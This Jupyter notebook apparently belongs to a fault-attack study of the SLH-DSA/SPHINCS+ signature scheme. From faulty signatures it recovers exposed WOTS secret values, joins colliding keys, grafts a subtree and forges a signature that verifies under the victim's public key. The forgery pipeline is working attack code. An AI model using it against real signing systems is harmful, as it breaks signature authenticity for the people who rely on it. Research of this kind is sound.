# Config

In [None]:
# Input files (all relative to `base`)
base = "data/"
#base = "../victims/sphincsplus/ref/"
sigs_file_base = "sigs_shake.txt"
keys_file = f"{base}keys_shake.txt"
sigs_file = f"{base}{sigs_file_base}"
sigs_simulated_file = f"{base}sigs_simulated.txt"

# SLH-DSA parameter set of the analysed signatures
params = 'SLH-DSA-SHAKE-256s'

# Pipeline switches
sanity_check = True      # re-sign the first signature and compare (see "Tooling sanity check")
simulate_faults = False  # additionally load simulated faulty signatures from sigs_simulated_file
filter_sigs = False      # write valid / secret-exposing signatures to ../sigs_filtered.txt
use_pickle = True        # cache expensive intermediate results in .pkl files

In [None]:
!SSH_AUTH_SOCK=/tmp/ssh-XXXXXXBjV56o/agent.34496 SSH_AGENT_PID=34497 rsync -avz --progress jb@141.83.162.134:/home/jb/rowhammer-jb/swage/keys_shake.txt jb@141.83.162.134:/home/jb/rowhammer-jb/swage/sigs_shake.txt data/

# Setup

Install dependencies and define some helper functions.

In [None]:
%pip install -r requirements.txt
!python --version

In [None]:
from spxplus import ADRS, SLH_DSA, WOTSKeyData

# Instantiate the selected parameter set and expose its parameters under the
# short names used throughout the notebook.
slh = SLH_DSA(params)
a, d, hp, n, k = slh.a, slh.d, slh.hp, slh.n, slh.k
lg_w, len1, len2, w = slh.lg_w, slh.len1, slh.len2, slh.w

In [None]:
def print_adrs(adrs: ADRS, end='\n', verbose=False):
    """Print the address bytes as space-separated groups of 8 hex digits (4 bytes each).

    With verbose=True a column header naming the address fields is printed first.
    The hex line is terminated by a space followed by `end`.
    """
    digits = adrs.adrs().hex()
    if verbose:
        columns = ('LAYER', ' ' * 4, 'TREE ADDR', ' ' * 18, 'TYP', ' ' * 6, 'KADR', ' ' * 5, 'PADD = 0')
        print(''.join(columns))
    words = (digits[pos:pos + 8] for pos in range(0, len(digits), 8))
    print(' '.join(words), end=' ')
    print(end=end)

In [None]:
# Pickling for compute-intensive data

import os

def pickle_load(filename: str, or_else) -> dict:
    """Return the value cached in `filename`, computing and caching it when missing.

    or_else: zero-argument callable producing the value on a cache miss.
    When `use_pickle` is False the cache is bypassed and `or_else()` is returned.

    Security: unpickling can execute arbitrary code, so only load cache files
    this notebook created itself. The cache is keyed only by `filename`; delete
    the file after changing inputs or filters that affect the cached value.
    """
    if not use_pickle:
        print(f"Pickle loading is disabled, using fallback.")
        return or_else()
    import pickle
    if not os.path.exists(filename):
        print(f"File {filename} not found, creating new one.")
        return pickle_store(filename, or_else)
    print(f"Loading pickle from {filename}.")
    with open(filename, 'rb') as f:
        return pickle.load(f)


def pickle_store(filename: str, fn):
    """Compute `fn()` and, when `use_pickle` is enabled, cache the result in `filename`.

    The value is first written to a temporary file and then renamed over
    `filename`. An interrupted or failing dump therefore never leaves a truncated
    cache behind that would break every later `pickle_load`.
    Returns the computed value in both modes.
    """
    if not use_pickle:
        print(f"Pickle storing is disabled, not saving {filename}.")
        return fn()
    import pickle
    value = fn()
    tmp_name = filename + ".tmp"
    try:
        with open(tmp_name, 'wb') as f:
            pickle.dump(value, f)
        os.replace(tmp_name, filename)  # atomic on POSIX and Windows
    except BaseException:
        # also covers KeyboardInterrupt: drop the partial file, then re-raise
        if os.path.exists(tmp_name):
            os.remove(tmp_name)
        raise
    return value

In [None]:
from typing import Generator

def shared_intermediates(v1: WOTSKeyData, valid: WOTSKeyData) -> list[tuple[int, int]]:
    """Find where the hash chains of `v1` pass through the values of the valid WOTS signature.

    For every chain of `v1.intermediates` (skipping each chain's first element),
    every intermediate equal to the matching n-byte chunk of `valid.sig` is
    reported as (chain_idx, hash_iter).

    Returns a list rather than a generator, so callers can both iterate it and use
    it in a boolean test (empty list == nothing shared). The previous generator
    version was always truthy, so checks like `if shared_intermediates(...)`
    never filtered anything.

    Returns [] when either key has no intermediates or when `v1 == valid`.
    """
    if not v1.intermediates or not valid.intermediates or v1 == valid:
        return []
    matches = []
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        # the valid signature's value for this chain (n bytes per chain)
        expected = valid.sig[chain_idx * n:(chain_idx + 1) * n]
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == expected:
                matches.append((chain_idx, hash_iter))
    return matches

def print_arr_w(arr: list[int], width):
    """Print `arr` on one line as '[ a b c ]', each value zero-padded to `width` digits."""
    cells = "".join(f"{x:0{width}d} " for x in arr)
    print("[ " + cells + "]")
    
def valid_sigs_d(groups):
    """Map each address to a valid key of its group (the last valid one if several).

    Addresses whose group has no valid key are omitted.
    """
    result = {}
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                result[adrs] = key
    return result

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: WOTSKeyData, adrs: ADRS, pk_seed: bytes, valid_key: WOTSKeyData | None = None, indent=''):
    """Pretty-print one observed WOTS key.

    Shows the validity flag, the first 128 hex digits of its signature, the stored
    and the recomputed public key, the index of the signature it came from, and
    the per-chain values (`chains`, `chains_calculated`). If `valid_key` is given
    and `v` is not valid, also lists the chain positions `v` shares with it.
    """
    if v.valid:
        status = "Valid"
    elif v.valid == False:
        status = "Invalid"
    else:
        status = "--"
    print(f"{indent}{status}", end='\t')
    print(f"{indent}{v.sig.hex()[:128]}...")
    print(f"{indent}\tPK (from tree)\t{hex(v.pk)}")
    recomputed_pk = v.calculate_pk(params, adrs, pk_seed)
    print(f"{indent}\tPK (calculated)\t{hex(recomputed_pk)}")
    print(f"{indent}\tWOTS key is part of signature {v.sig_idx}")

    # column header (chain indices) followed by both chain-value rows
    print(f"{indent}\t\t\t", end='')
    print_arr_w(list(range(len(v.chains))), 2)
    print(f"{indent}\tchains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(f"{indent}\tchains (calc)\t", end='')
    print_arr_w(v.chains_calculated, 2)

    if not valid_key or v.valid:
        return
    for chain_idx, exposed in shared_intermediates(v, valid_key):
        print(f"{indent}\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[ADRS, list[WOTSKeyData]], skip_no_exposed=True):
    """Print every address group, ordered by layer, with its valid key and its invalid keys.

    pk_seed: public seed, used to recompute WOTS public keys for display.
    groups: mapping address -> keys observed at that address.
    skip_no_exposed: when True, omit invalid keys that share no chain value with
        the address's valid key (they expose no WOTS secret values). Invalid keys
        at addresses without a valid key are omitted too in that mode.
    """
    # Exposure is detected by running the WOTS chains (shared_intermediates);
    # comparing public keys is not needed.
    valid_sigs = valid_sigs_d(groups)

    # sort by layer address
    ordered = sorted(groups.items(), key=lambda item: item[0].get_layer_address())

    for adrs, keys in ordered:
        valid_sig = valid_sigs.get(adrs)
        invalid_sigs = [v for v in keys if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(keys))

        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid:
                # shared_intermediates may return a generator (always truthy), so
                # check whether it actually yields a shared position
                exposes = valid_sig is not None and any(True for _ in shared_intermediates(v, valid_sig))
                if not exposes:
                    continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell (and all cells below it) for a clean analysis.

In [None]:
# Start from an empty mapping: address -> WOTS keys observed at that address.
# NOTE(review): "Load real signatures" below rebinds `groups` to the loaded data,
# so this reset only matters if that cell is skipped.
groups: dict[ADRS, set[WOTSKeyData]] = {}

In [None]:
# Load the key pair: one "name: hexvalue" entry per line ('sk' and 'pk' are required).
with open(keys_file, "r") as f:
    # split only at the first ': ' and skip blank lines, so an empty line does
    # not abort parsing with an IndexError
    entries = [line.split(': ', 1) for line in f if line.strip()]
    keys = {name: bytes.fromhex(value.strip()) for name, value in entries}
sk = keys['sk']
pk = keys['pk']
# pk = PK.seed || PK.root; the first n bytes are the public seed
pk_seed = pk[:n]
pk.hex()

# Update Experiment
Run this cell (and all cells below it) to process new signatures.

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [None]:
from cryptanalysis_lib import extract_wots_keys


def load_groups():
    """Read every hex-encoded signature line of `sigs_file` and extract its WOTS keys.

    Returns (sigs, groups): the raw signatures as bytes and the result of
    extract_wots_keys(pk, sigs, params).
    """
    with open(sigs_file, "r") as f:
        sigs = [bytes.fromhex(line.strip()) for line in f.readlines()]
        # sigs = sigs[:1000]
    print(f"Processing {len(sigs)} signatures...", end=' ')
    return sigs, extract_wots_keys(pk, sigs, params)


sigs, groups = pickle_load(sigs_file_base + ".pkl", load_groups)
print(f"Loaded {len(sigs)} signatures in {len(groups)} groups")
total_sigs = sum(map(len, groups.values()))
print(f"Total signatures in groups: {total_sigs}")
valid_sig_ids = {key.sig_idx for members in groups.values() for key in members if key.valid}
print(f"valid signatures: {len(valid_sig_ids)}")
invalid_sig_ids = {key.sig_idx for members in groups.values() for key in members if not key.valid}
print(f"invalid signatures: {len(invalid_sig_ids)}")

# Load simulated faulty signatures
This section loads simulated faulty signatures from `sigs_simulated_file` (only when `simulate_faults` is enabled).

In [None]:
import os

from cryptanalysis_lib import merge_groups

if simulate_faults:
    with open(sigs_simulated_file, "r") as f:
        faulty_sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    # pass the parameter set explicitly, exactly like the real-signature loader does
    simulated_groups = extract_wots_keys(pk, faulty_sigs, params)
    # mark every simulated key so it can be told apart after merging
    for keys in simulated_groups.values():
        for key in keys:
            key.simulated = True
    # NOTE(review): sig_idx of simulated keys presumably indexes `faulty_sigs`, not `sigs`;
    # code that does sigs[key.sig_idx] (e.g. filter_signatures) would pick the wrong signature.
    #print_groups(pk_seed, simulated_groups)
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

# Tooling sanity check

This section regenerates the first signature in `sigs_file` using the same key and the same randomizer R.
We expect the two signatures to match. This assumes that the first signature in `sigs_file` is valid.

In [None]:
if not sanity_check:
    print("Skipping sanity check")
else:
    # Signature layout: R (n bytes) | FORS signature | d x (WOTS signature + XMSS auth path);
    # each stored line in sigs_file carries the message after these sig_len bytes.
    wots_len = slh.len
    wots_bytes = n * wots_len
    xmss_bytes = n * hp
    fors_bytes = k * (n + n * a)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]
    r, m = sig[:n], sig[sig_len:]
    # re-sign with the recovered R and append the message like the stored signature
    pysig = slh.slh_sign_internal(m, sk, None, r=r, stop_at=None) + m

    if pysig == sig:
        print("Passed sanity check")
    else:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())

# Extract WOTS keys

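The WOTS keys of all signatures were extracted when the signatures were loaded. The cell below optionally plots the distribution of chain steps in the valid keys (disabled by default).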

In [None]:
# Shows distribution of steps in WOTS chains
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

Addresses at which several distinct WOTS keys were observed (collisions) appear here.

In [None]:
# sanity check for multiple valid keys: every address may carry at most one valid WOTS key
for adrs, keys in groups.items():
    if sum(1 for v in keys if v.valid) <= 1:
        continue
    print("ERROR: found multiple valid keys for the same address", adrs, keys)
    raise ValueError("Multiple valid keys for the same address")

In [None]:
# maintain a dictionary of valid signatures per adrs (address -> its valid WOTS key)
valid_sigs = valid_sigs_d(groups)
print("Found", len(valid_sigs), "valid signatures in groups")

In [None]:
# only keep keys at target layer, dropping groups that are empty
target_layer = 7
groups = {
    address: members
    for address, members in groups.items()
    if address.get_layer_address() == target_layer and len(members) > 0
}
print(f"Found {len(groups)} groups at layer {target_layer}")

In [None]:
def max_collisions_by_sig_count(groups: "dict[ADRS, set[WOTSKeyData]]", step: int = 100):
    """Yield (idx, count) checkpoints of collision growth.

    `count` is the largest number of distinct WOTS signatures seen at any
    single address when only signatures with sig_idx < idx are considered.
    Checkpoints are taken every `step` signatures starting at 0. A final
    checkpoint at max_idx + 1 is always yielded so the last (partial) batch of
    signatures is included; the previous range(0, max_idx, 100) dropped it.
    Yields nothing when there are no keys.
    """
    max_idx = max((key.sig_idx for keys in groups.values() for key in keys), default=-1)
    if max_idx < 0:
        return
    checkpoints = list(range(0, max_idx + 1, step))
    checkpoints.append(max_idx + 1)  # every signature counted
    for idx in checkpoints:
        count = max(len({key.sig for key in keys if key.sig_idx < idx}) for keys in groups.values())
        yield (idx, count)

In [None]:
# CSV rows "idx,count" for plotting collision growth
for idx, count in max_collisions_by_sig_count(groups):
    print(f'{idx},{count}')

In [None]:
# only keep collisions
from cryptanalysis_lib import find_collisions


groups = find_collisions(groups)
print("Found", len(groups), "groups with collisions")

In [None]:
# post-process collided WOTS keys
def calc_intermediates() -> dict[ADRS, set[WOTSKeyData]]:
    """Compute WOTS chain intermediates for every key in the global `groups`, in place.

    Each key is processed against its address's valid key from `valid_sigs`.
    Addresses without a valid key are skipped. Returns `groups` so the result can
    be cached by pickle_load. Only reads the globals, so no `global` declaration
    is needed.
    """
    for adrs, keys in groups.items():
        valid_sig = valid_sigs.get(adrs)
        if valid_sig is None:
            continue
        for key in keys:
            key.calculate_intermediates(params, adrs, pk_seed, valid_sig)
    return groups

# NOTE(review): the cache name depends only on the signature file, not on target_layer
# or the earlier filters; delete the .pkl after changing them.
groups: dict[ADRS, set[WOTSKeyData]] = pickle_load("groups_intermediates_" + sigs_file_base + ".pkl", calc_intermediates)
# After a pickle reload `groups` holds new objects, while `valid_sigs` still points at the
# pre-cache keys on which calculate_intermediates never ran. Re-point it at the reloaded
# valid keys (a no-op on a fresh run, where they are the same objects).
valid_sigs.update(valid_sigs_d(groups))
print(f"Calculated intermediates for {len(groups)} groups")
assert all(s.chains_calculated for _, sigs in groups.items() for s in sigs), "Not all keys have calculated chains"

In [None]:
# filter out signatures containing no WOTS secrets
# Keeps, per address, only keys with at least one chain_calculated value below 17, then
# re-applies find_collisions so addresses left with no collision drop out.
# NOTE(review): 17 is a magic threshold, presumably tied to w = 16 for this parameter set;
# confirm which value WOTSKeyData.chains_calculated uses for "nothing recovered".
groups = {adrs: [sig for sig in sigs if any(i < 17 for i in sig.chains_calculated)] for adrs, sigs in groups.items()}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

In [None]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[ADRS, set[WOTSKeyData]]) -> set[bytes]:
    """Select the raw signatures worth keeping from colliding addresses.

    Only addresses with a collision, a valid key and at least two keys are
    considered. At those addresses the function keeps the signatures of valid
    keys, plus those of invalid keys whose chains pass through a value of the
    valid signature (i.e. that expose WOTS secrets).

    sigs: raw signatures, indexed by WOTSKeyData.sig_idx.
    Returns the set of kept signature bytes.
    """
    filtered_sigs = set()
    collisions = find_collisions(wots_keys)
    collisions = {adrs: keys for adrs, keys in collisions.items() if any(key.valid for key in keys) and len(keys) > 1}
    reference_keys = valid_sigs_d(wots_keys)
    for adrs, keys in collisions.items():
        valid_key = reference_keys.get(adrs)
        for key in keys:
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            # shared_intermediates may return a generator, which is always truthy,
            # so test whether it actually yields a shared position
            elif valid_key is not None and any(True for _ in shared_intermediates(key, valid_key)):
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

# Combine WOTS Keys
This section combines the collided WOTS keys at each address into a single key that can sign as many messages as possible.

In [None]:
# filter groups with exposed WOTS secrets: keep an address only if at least one invalid
# key's chains pass through a value of that address's valid WOTS signature.
# Prefer each group's own valid key (the object calc_intermediates processed, also after
# a pickle reload) and fall back to the global valid_sigs map; addresses without any
# valid key are dropped instead of raising KeyError.
reference_keys = {**valid_sigs, **valid_sigs_d(groups)}
groups: dict[ADRS, set[WOTSKeyData]] = {
    adrs: sigs
    for adrs, sigs in groups.items()
    if adrs in reference_keys
    and any(
        # shared_intermediates may return a generator (always truthy), so
        # check whether it actually yields a shared position
        not sig.valid and any(True for _ in shared_intermediates(sig, reference_keys[adrs]))
        for sig in sigs
    )
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
#print_groups(pk_seed, groups)

In [None]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[ADRS, set[WOTSKeyData]], params, pk_seed) -> dict[ADRS, WOTSKeyData]:
    """Join all keys observed at an address into one WOTS key, starting from a copy of the valid key.

    Addresses with fewer than two keys are skipped. Addresses without a valid key
    are also skipped, with a notice, because there is nothing to anchor the join on;
    previously these raised KeyError. Returns address -> joined key.
    """
    joined_sigs = {}
    reference_keys = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2:
            continue
        valid_key = reference_keys.get(adrs)
        if valid_key is None:
            print("No valid key at address, skipping:", end=' ')
            print_adrs(adrs)
            continue
        joined = deepcopy(valid_key)  # never mutate the stored valid key
        if not joined.chains_calculated:
            print_adrs(adrs)
            joined.calculate_intermediates(params, adrs, pk_seed, valid_key)
        for key in keys:
            joined = joined.join(key, params)
        joined_sigs[adrs] = joined
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")
# Filter out signatures with all chains set to 0
#joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
#print(f"Filtered {len(joined_sigs)} (wildcard chains)")

In [None]:
def score(key: WOTSKeyData) -> int:
    """Score a (joined) WOTS key by the messages it can sign.

    Splits `chains_calculated` into the len1 message chains and the checksum
    chains, and sums the second field of every entry returned by
    signable_messages (presumably a per-entry message count).
    """
    from cryptanalysis_worker import signable_messages
    split_at = slh.len1
    chains = key.chains_calculated
    entries = signable_messages(chains[:split_at], chains[split_at:], w, len1, len2)
    total = 0
    for _, count in entries:
        total += count
    return total

In [None]:
import math


# Show joined keys from best to worst score, each followed by all keys observed at its address.
total_messages_log2 = math.log2(w**len1)
scores = {adrs: score(joined_key) for adrs, joined_key in joined_sigs.items()}  # compute each score once

for adrs, joined_key in sorted(joined_sigs.items(), key=lambda item: scores[item[0]], reverse=True):
    key_score = scores[adrs]
    print_adrs(adrs, verbose=True)
    # log2(score / w**len1); a key that can sign nothing gets -inf instead of crashing log2(0)
    relative = math.log2(key_score) - total_messages_log2 if key_score > 0 else float('-inf')
    print("Score: ", relative)
    print_key_data(joined_key, adrs, pk_seed, None)

    print("=" * 64)
    print("All keys for exposed address:")
    print_adrs(adrs, verbose=True)
    for member in groups[adrs]:
        print_key_data(member, adrs, pk_seed, valid_sigs.get(adrs))

In [None]:
# calculate the number of signable messages per joined key
# NOTE(review): an earlier note said "without checksum", but score() also passes the
# checksum chains to signable_messages; confirm which is intended.
import math

def num_signable_messages(key: WOTSKeyData) -> int:
    """Number of messages the joined WOTS key can sign (currently identical to `score`)."""
    return score(key)

candidates = list(joined_sigs.items())
if not candidates:
    raise ValueError("No joined WOTS keys available; cannot pick a key for tree grafting")
num_signable = [num_signable_messages(joined_key) for _, joined_key in candidates]
# Expected number of random message digests to try until one is signable: w**len1 / #signable.
# A key that can sign nothing needs infinitely many tries (instead of ZeroDivisionError).
expected_reps = [(w**len1) / count if count > 0 else math.inf for count in num_signable]

# take the best key in the set
most_exposed_adrs, most_exposed_key = candidates[num_signable.index(max(num_signable))]
expected_reps_best = min(expected_reps)

print([math.log2(r) for r in expected_reps])

In [None]:
# sign a random message with the exposed key
#msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
#assert most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

# Tree Grafting

Computation gets costly from here on. Tread lightly.

In [None]:
import cryptanalysis_lib as clib

In [None]:
# Time one call of the signing worker with a batch of a single message (same tuple layout
# as the work items built in sign_message_batch_mp) to gauge the cost per attempt before
# starting the full search.
%timeit clib.sign_worker((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [None]:
#%timeit clib.sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))
#%timeit clib.treehash_c_shake_256s()

In [None]:
#%timeit clib.sign_worker_xmss_c((1, most_exposed_adrs, most_exposed_key, pk_seed, params))
#%timeit clib.treehash_c_sha2_256s()

In [None]:
import math
from multiprocessing import Pool
from os import cpu_count

import concurrent

def sign_message_batch_mp(total_msgs, adrs, key, pk_seed, params, num_procs: int = 0):
    """
    Use a process pool to try about `total_msgs` messages with the exposed (adrs, key),
    split evenly over `num_procs` worker processes (num_procs <= 0 means all CPUs).

    Returns the first truthy result of any clib.sign_worker call, or None if no
    worker succeeds. Worker exceptions are printed and the remaining batches continue.
    """
    if num_procs <= 0:
        num_procs = cpu_count() or 1

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # One work item per process
    work = [(per_proc, adrs.copy(), key, pk_seed, params) for _ in range(num_procs)]

    # multiprocessing.Pool's context manager calls terminate() on exit. Returning the first
    # hit therefore stops the other workers immediately. A ProcessPoolExecutor `with`
    # block instead waits for all running batches, and Future.cancel() cannot stop them.
    with Pool(processes=num_procs) as pool:
        results = pool.imap_unordered(clib.sign_worker, work)
        while True:
            try:
                result = next(results)
            except StopIteration:
                break
            except Exception as e:
                print("Error:", e)
                continue
            if result:
                return result
    return None

print(f"Expected repetitions 2^{math.log2(expected_reps_best)}")
# refuse searches that are out of reach
if expected_reps_best > 2**37:
    raise ValueError(f"Expected repetitions 2^{math.log2(expected_reps_best)} are too high, aborting")
# Budget twice the expected number of attempts. Assuming independent attempts that each
# succeed with probability 1/expected_reps_best, the search then fails with probability ~ e^-2.
num_sigs = math.ceil(expected_reps_best * 2)

print(f"Signing {num_sigs} messages")
# Leave one core for the notebook but always request at least one worker
# (cpu_count() may return None or 1).
num_workers = max(1, (cpu_count() or 1) - 1)
ret = sign_message_batch_mp(num_sigs, most_exposed_adrs, most_exposed_key, pk_seed, params, num_procs=num_workers)
if not ret:
    raise ValueError("No valid signature found")
xmss_pk, adrs, sk_seed, key = ret
print("Successfully grafted tree for XMSS PK " + xmss_pk.hex())
print("Address")
print_adrs(adrs, verbose=True)
print("SK seed:", sk_seed.hex())
print("PK seed:", pk_seed.hex())
print("Key:", key)

In [None]:
def forge(valid_sig: bytes, sk: bytes, pk: bytes, adrs: ADRS, key: WOTSKeyData, m: bytes, params: str):
    """Forge a signature on `m` by grafting the subtree signed with `sk` under the exposed WOTS key.

    valid_sig: a valid signature (message stripped) under `pk`; its top XMSS auth path is reused.
    sk: secret key used for the FORS signature and the hypertree layers below target_layer.
    pk: victim public key, PK.seed || PK.root.
    adrs, key: address of the exposed WOTS key (at layer target_layer) and the joined key.
    Returns bottom_part + forged WOTS signature + top_part.
    Raises ValueError if the exposed key cannot sign the grafted subtree root.
    """
    slh = SLH_DSA(params)
    n, d, hp = slh.n, slh.d, slh.hp
    # layout sizes derived from the parameter set instead of notebook globals
    wots_bytes = slh.len * n
    xmss_bytes = hp * n
    fors_bytes = slh.k * (n + slh.a * n)
    pk_seed = pk[:n]
    pk_root = pk[n:]
    # XMSS auth path of layer d-1, taken from the valid signature.
    # NOTE(review): only correct when target_layer == d - 1 (true for target_layer = 7, d = 8);
    # for lower layers the tree address would also have to match.
    top_start = n + fors_bytes + (d - 1) * (wots_bytes + xmss_bytes) + wots_bytes
    top_end = n + fors_bytes + d * (wots_bytes + xmss_bytes)
    top_part = valid_sig[top_start:top_end]

    target_leaf = adrs.get_key_pair_address()
    leaf_mask = (1 << hp) - 1
    # Search a randomizer R whose message digest routes the hypertree path through the
    # exposed key's leaf at target_layer. The leaf must be compared with the key-pair
    # address (not the layer address).
    while True:
        r = os.urandom(n)
        digest = slh.h_msg(r, pk_seed, pk_root, m)
        (_, i_tree, i_leaf) = slh.split_digest(digest)
        # as in SLH-DSA ht_sign: after j steps, i_leaf is the leaf index used at layer j
        for _ in range(target_layer):
            i_leaf = i_tree & leaf_mask  # i_leaf = i_tree mod 2^h'
            i_tree >>= hp                # i_tree >> h'
        if i_leaf == target_leaf:
            break

    # Pass R explicitly (as in the sanity check) so the signature uses the digest searched above.
    bottom_part, root = slh.slh_sign_internal(m, sk, None, r=r, stop_at=target_layer - 1)
    # Signing is deterministic for a fixed R and sk, so retrying could never succeed.
    forged_sig = key.try_sign(root, adrs, pk_seed, params)
    if not forged_sig:
        raise ValueError("Exposed WOTS key cannot sign the grafted subtree root")
    print(len(bottom_part))
    print(len(forged_sig))
    print(len(top_part))
    return bottom_part + forged_sig + top_part

# Secret key for the grafted subtree, built from the sk_seed found by the search above
# and a fresh random n-byte SK.prf.
sk_prf = os.urandom(n)
_, sk = slh.slh_keygen_internal(sk_seed, sk_prf, pk_seed, params)
# NOTE(review): verification hashes the message with the victim's PK.root; confirm that
# signing with this `sk` uses that same root when computing the message digest.

valid_key = next((member for member in groups[most_exposed_adrs] if member.valid), None)
if valid_key is None:
    raise ValueError("No valid WOTS key at the most exposed address")

wots_bytes = slh.len * n
xmss_bytes = hp * n
fors_bytes = k * (n + a * n)
sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)
# stored lines are signature || message
valid_sig = sigs[valid_key.sig_idx]
m = valid_sig[sig_len:]
valid_sig = valid_sig[:sig_len]
# messages are arbitrary bytes; don't let a non-UTF-8 message abort the demo
m_text = m.decode(errors="replace")

print(f'verifying message "{m_text}" with valid signature')
suc = slh.slh_verify_internal(m, valid_sig, pk, params)
print("Signature verification result:", suc)

print(f'Signining message "{m_text}" with compromised key')
sig = forge(valid_sig, sk, pk, most_exposed_adrs, most_exposed_key, m, params)
print(f'verifying message "{m_text}" with forged signature')
suc = slh.slh_verify_internal(m, sig, pk, params)
print("Signature verification result:", suc)